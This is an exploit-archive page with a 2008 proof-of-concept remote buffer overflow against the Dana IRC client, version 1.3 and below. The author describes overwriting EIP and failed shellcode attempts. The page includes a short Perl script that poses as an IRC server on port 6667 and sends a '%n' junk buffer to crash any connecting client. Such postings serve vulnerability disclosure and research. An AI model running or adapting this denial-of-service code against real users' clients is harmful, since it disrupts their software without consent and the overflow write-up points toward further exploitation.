exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

danairc-dos.txt

danairc-dos.txt
Posted Jun 16, 2008
Authored by t0pp8uzz

Dana IRC versions 1.3 and below remote buffer overflow denial of service proof of concept exploit.

tags | exploit, remote, denial of service, overflow, proof of concept
SHA-256 | 31b0eb47f8fddcecfc64b726d0ab94bb982e59fca895723a51548ae5038002a7

danairc-dos.txt

Change Mirror Download
- Dana IRC <= 1.3 Remote Buffer Overflow POC/Crash -

Discovered On: 14 JUNE 2008
Discovered By: t0pP8uZz

Download: diebestenbits.de


- Info -

Dana Irc client suffers from a remote buffer overflow, sending a buffer of around 2k
overwrites the EIP therefor crashes the client. The reason why there isnt any shellcode here
is because the client is coverting the junk/buffer data to unicode so its corrupting the shellcode
ive tried sending unicode buffer but the same problem occurs.

if anyone else can get further please let me know. but i doubt you can.

there are also other registers you can overwrite using diffrent junk data to overflow them.

the peice of perl code below will listen on port 6667 and when a Dana IRC client connects
it will crash the client. its also possible to send the data direct to the user.

peace, t0pP8uZz

#!/usr/bin/perl

use IO::Socket;

$sock = IO::Socket::INET->new( Proto => 'tcp', LocalPort => '6667', Listen => SOMAXCONN, Reuse => 1 );

$jnk = "%n"x1000;
print "Running..";
while($client = $sock->accept()) {
print $client "$jnk\r\n";
print "Crashed Client!\n";
}

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close